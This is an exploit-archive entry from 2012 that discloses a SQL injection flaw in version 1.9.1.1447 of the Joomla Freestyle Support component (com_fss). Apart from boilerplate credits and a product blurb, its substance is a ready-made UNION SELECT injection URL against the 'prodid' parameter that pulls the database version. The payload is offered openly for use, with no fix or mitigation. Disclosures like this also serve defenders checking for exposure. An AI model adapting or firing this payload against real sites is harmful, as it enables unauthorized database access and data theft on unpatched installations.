Joomla! Component com_fss 1.9.1.1447 - SQL Injection



EKU-ID: 27587 CVE: OSVDB-86499 OSVDB-ID:
Author: D4NB4R Published: 2012-10-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


 Exploit Title: Joomla Freestyle Support com_fss sqli

 Dork: N/A

 Date: [17-10-2012]

 Author: Daniel Barragan "D4NB4R"

 Twitter: @D4NB4R

 Vendor: http://freestyle-joomla.com

 Version: Version 1.9.1.1447 (last update on Oct 15, 2012)

 License: Commercial

 Download: http://freestyle-joomla.com/fssdownloads

 Tested on: [Linux(bt5)-Windows(7ultimate)]

 Especial greetz:  Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Descripcion joomla component:

Advanced ticketed support/help desk on your website. Includes Knowledge Base, FAQs, Announcements, Glossary, Tickets by Email, Testimonials and many other features. Robust, customizable, professional, affordable and easy to use.

Warning: Invalid argument supplied for foreach() in


Exploit:


    SQL : SQL injection

           http://127.0.0.1/index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R


_____________________________________________________
Daniel Barragan "D4NB4R" 2012